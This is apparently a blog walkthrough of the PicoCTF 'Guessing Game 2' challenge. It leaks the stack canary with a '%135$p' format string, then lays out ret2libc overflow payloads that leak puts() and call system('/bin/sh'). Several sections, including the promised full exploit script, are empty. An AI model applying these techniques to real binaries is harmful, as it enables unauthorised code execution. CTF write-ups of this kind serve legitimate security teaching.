PicoCTF — Guessing Game 2 Walkthrough | ret2libc, stack cookies

Prerequisite Knowledge:

Tools Used:

A word of caution:


Also, you’ll find the complete exploit script at the end of this post.

Reading through the logic:

Guessing the number:

long get_random() {
return rand;
int do_stuff() {
long ans = (get_random() % 4096) + 1;

Leaking the stack cookie:

; var int32_t var_ch @ ebp-0xc
0x08048783 65a114000000 mov eax, dword gs:[0x14]
0x08048789 8945f4 mov dword [var_ch], eax
0x0804878c 31c0 xor eax, eax
0x080487e9 8b45f4 mov eax, dword [var_ch]
0x080487ec 653305140000. xor eax, dword gs:[0x14]
┌─< 0x080487f3 7405 je 0x80487fa
│ 0x080487f5 e816010000 call sym.__stack_chk_fail_local
└─> 0x080487fa 8b5dfc mov ebx, dword [var_4h]
0x080487fd c9 leave
0x080487fe c3 ret
void win() {
char winner[BUFSIZE];
printf("New winner!\nName? ");
printf("Congrats: ");
00:0000│ esp  0xffffcf80 ◂— 0x1
83:020c│ 0xffffd18c ◂— 0xc552c600 // THE COOKIE
86:0218│ ebp 0xffffd198 —▸ 0xffffd1b8 ◂— 0x0
/* After guessing the correct answer, use '%135$p' as your name */
New winner!
Name: %135$p
Congrats: 0xc552c600

Getting the EIP offset:

Making the BOF payload:

512 bytes junk + stack cookie (ebp-0xc) + 12 (0xc) bytes junk + function address (eip) + return address + function parameter/s (if any)

Leaking the address of puts():

512 bytes junk + stack cookie (ebp-0xc) + 12 (0xc) bytes junk + plt entry of puts() + address of win() + got entry of puts()

Getting the correct libc version:

Popping the shell:

512 bytes junk + stack cookie (ebp-0xc) + 12 (0xc) bytes junk + address of system() + any return address + address of "/bin/sh"

The complete exploit:


OSCP enthusiast | A curious, ‘amateur’, budding ethical hacker

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store